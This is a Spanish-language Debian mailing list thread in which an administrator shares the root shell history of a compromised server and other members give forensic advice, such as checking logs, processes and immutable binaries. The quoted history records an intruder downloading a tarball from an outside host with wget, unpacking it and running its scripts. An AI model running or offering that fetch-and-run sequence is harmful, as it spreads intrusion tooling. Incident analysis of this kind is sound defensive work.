revisa estos enlaces.. http://guias.ovh.es/ServidorHackee http://guias.ovh.es/ServidorSemihackeado2
http://guias.ovh.es/ServidorSemiHackeado la información estas diseñada para servidores virtuales.. pero igual te puede ayudar: Díaz Luis http://www.facebook.com/diazluis2007 User Linux 532223 progjuegos.com TSU Analisis de Sistemas Universidad de Carabobo Facultad de Odontología <http://www.odontologia.uc.edu.ve/> El 12 de junio de 2011 14:27, Juan Antonio <[email protected]> escribió: > El 13/05/11 17:39, ciracusa escribió: > > Lista, buenas tardes. > > > > Perdón si este tema no esta directamente relacionado con Debian, pero > > como el server en cuestión tiene Squeeze y es un tema de seguridad creo > > que puede interesarles a mas de uno. > > > > Ayer viendo el history de root de un servidor veo lo siguiente: > > > > 314 ./go.sh 189 > > 315 w > > 316 cd > > 317 cd /var/tmp/ > > 318 rm -rf gosh > > 319 ls -a > > 320 exit > > 321 cat /proc/cpuinfo > > 322 passwd > > 323 cd /var/tmp/ > > 324 cd gosh > > 325 touch bios.txt > > 326 chmod +x * > > 327 screen > > 328 exit > > 329 cat /proc/cpuinfo > > 330 cd /var/tmp/ > > 331 ls -a > > 332 wget http://gblteam.webs.com/gosh.tgz.tar > > 333 tar zxvf gosh.tgz.tar > > 334 rm -rf gosh.tgz.tar > > 335 cd gosh > > 336 touch bios.txt > > 337 chmod +x * > > 338 ./go.sh 200 > > 339 cd > > 340 cd /var/tmp/ > > 341 ls -a > > 342 rm -rf gosh > > 343 ls -a > > 344 exit > > 345 cd /var/tmp/ > > 346 perl x.pl > > > > > > Que opinan? > > > > Entiendo -lamentablemente- que el server fue comprometido, pero lo que > > no llego a comprender es el alcance de esto. > > > > Notar que puse el link para que puedan descargarlo uds. también y > > analizarlo (tomando las precauciones del caso). > > > > Bueno, si alguien tiene algo de info muy agradecido. > > > > Y si pueden recomendarme algunos pasos para analizar la seguridad del > > server desde ya muchas gracias. > > > > Salu2. > > > > > > El tipo trabaja en /var/tmp asi que probablemente sea porque no tiene > acceso como superusuario. Haz un ls -l del archivo que subió y mira el > propietario, asi sabras que usuario es el que tienes comprometido. Y > como te han dicho revisa los log del sistema para ver como lo hicieron. > > Por otra parte, te recomiendan que reinstales sin saber si quiera el > alcance de la intrusión, yo no lo haría hasta estar seguro que te la > hayan metido hasta el fondo. Usa ps, lsof, netstat y demas para ver si > hay procesos anómalos ejecutándose y si no tienes tripwire usa lsattr > para buscar atributos que no deberían tener binarios del sistema como > ps, lsof, netstat, etc... suelen dejarlos como inmutables para que no > puedas sustituirlos. > > Un saludo. > > -- > "Tanto en los deportes como en todo lo demás, soy un experto. Pero para > mantener viva mi inteligencia natural y fuera de serie, tengo que comer > mucho" > > > -- > To UNSUBSCRIBE, email to [email protected] > with a subject of "unsubscribe". Trouble? Contact > [email protected] > Archive: http://lists.debian.org/[email protected] > >

